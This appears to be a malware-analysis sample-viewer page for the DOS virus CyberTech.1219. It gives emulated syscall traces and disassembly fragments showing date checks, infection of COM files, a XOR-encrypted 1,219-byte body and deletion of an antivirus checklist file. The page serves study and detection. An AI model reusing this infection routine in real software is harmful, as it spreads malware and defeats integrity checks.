Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.1219


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-17T22:28:52.046951184Z 48 PC: 12a99 | Get DOS version
2018-12-17T22:28:52.048692135Z 42 PC: 12aa4 | Get date
0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-17T22:28:52.051255306Z 26 PC: 12ab4 | Set disk transfer address
2018-12-17T22:28:52.052938581Z 67 PC: 12b02 | Get or set file attributes
2018-12-17T22:28:52.067308294Z 67 PC: 12b0f | Get or set file attributes
2018-12-17T22:28:52.329398393Z 61 PC: 12b14 | Open file (Filename = 'A:\TEST.COM')
2018-12-17T22:28:52.336404911Z 87 PC: 12b1b | Get or set file date and time
2018-12-17T22:28:52.339261337Z 62 PC: 12b21 | Close file
2018-12-17T22:28:52.342074021Z 60 PC: 12b2a | Create or truncate file
2018-12-17T22:28:52.353841757Z 64 PC: 12b39 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:28:52.357384273Z 87 PC: 12b40 | Get or set file date and time
2018-12-17T22:28:52.359494956Z 62 PC: 12b44 | Close file
2018-12-17T22:28:52.366813246Z 67 PC: 12b4d | Get or set file attributes
2018-12-17T22:28:52.37699943Z 9 PC: 12b57 | Display string (Could not find end pointer)
2018-12-17T22:28:52.397351969Z 26 PC: 12d06 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5153,"SideJobID":0}


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:53:47.990829146Z 48 PC: 12a99 | Get DOS version
2018-12-25T11:53:47.993269123Z 42 PC: 12aa4 | Get date
0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-25T11:53:47.995950066Z 26 PC: 12b61 | Set disk transfer address
2018-12-25T11:53:47.997384644Z 78 PC: 12b6b | Find first file
2018-12-25T11:53:48.005221612Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T11:53:48.010456049Z 67 PC: 12b80 | Get or set file attributes
2018-12-25T11:53:48.024205746Z 61 PC: 12b85 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:53:48.0370893Z 87 PC: 12b8b | Get or set file date and time
2018-12-25T11:53:48.038866324Z 63 PC: 12b98 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:53:48.045613189Z 66 PC: 12bbe | Move file pointer
2018-12-25T11:53:48.046840322Z 66 PC: 12c5d | Move file pointer
2018-12-25T11:53:48.048295826Z 63 PC: 12c67 | Read file or device (Read 52 bytes on handle 5)
2018-12-25T11:53:48.050853039Z 66 PC: 12bbe | Move file pointer (See above)
2018-12-25T11:53:48.052323946Z 44 PC: 12cb4 | Get time
0x12cb4: cmp dl, 0
0x12cb7: jne 0x12cc3
0x12cb9: mov ah, 9
0x12cbb: lea dx, word ptr [bp + 0x468]
0x12cbf: int 0x21
0x12cc1: jmp 0x12cb0
0x12cc3: mov byte ptr cs:[bp + 0x18], dl
0x12cc8: lea si, word ptr [bp + 4]
0x12ccc: mov di, 0xfb00
0x12ccf: mov cx, 0x18
0x12cd2: rep movsb byte ptr es:[di], byte ptr [si]
0x12cd4: lea si, word ptr [bp + 0x1c]
0x12cd8: mov cx, 0x4ab
0x12cdb: lodsb al, byte ptr [si]
0x12cdc: xor al, dl
0x12cde: stosb byte ptr es:[di], al
0x12cdf: loop 0x12cdb
0x12ce1: mov ah, 0x40
0x12ce3: mov dx, 0xfb00
0x12ce6: mov cx, 0x4c3
2018-12-25T11:53:48.055123245Z 64 PC: 12ceb | Write file or device (Write 1219 bytes on handle 5)
2018-12-25T11:53:48.064643367Z 66 PC: 12bbe | Move file pointer (See above)
2018-12-25T11:53:48.066444151Z 64 PC: 12cfc | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:53:48.074823024Z 87 PC: 12d2c | Get or set file date and time
2018-12-25T11:53:48.076488561Z 62 PC: 12d30 | Close file
2018-12-25T11:53:48.085015298Z 67 PC: 12d39 | Get or set file attributes
2018-12-25T11:53:48.090572989Z 65 PC: 12d41 | Delete file (Filename = 'chklist.cps')
2018-12-25T11:53:48.097681472Z 26 PC: 12d06 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5153,"SideJobID":0}


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:53:48.156919026Z 48 PC: 12a99 | Get DOS version
2018-12-25T11:53:48.159360874Z 42 PC: 12aa4 | Get date
0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-25T11:53:48.161905876Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T11:53:48.163338926Z 67 PC: 12b02 | Get or set file attributes
2018-12-25T11:53:48.169798768Z 67 PC: 12b0f | Get or set file attributes
2018-12-25T11:53:48.188694153Z 61 PC: 12b14 | Open file (Filename = 'A:\TEST.COM')
2018-12-25T11:53:48.195836826Z 87 PC: 12b1b | Get or set file date and time
2018-12-25T11:53:48.197473813Z 62 PC: 12b21 | Close file
2018-12-25T11:53:48.199968688Z 60 PC: 12b2a | Create or truncate file
2018-12-25T11:53:48.21280376Z 64 PC: 12b39 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:53:48.215208871Z 87 PC: 12b40 | Get or set file date and time
2018-12-25T11:53:48.217184852Z 62 PC: 12b44 | Close file
2018-12-25T11:53:48.222626628Z 67 PC: 12b4d | Get or set file attributes
2018-12-25T11:53:48.229534858Z 9 PC: 12b57 | Display string (Could not find end pointer)
2018-12-25T11:53:48.24173664Z 26 PC: 12d06 | Set disk transfer address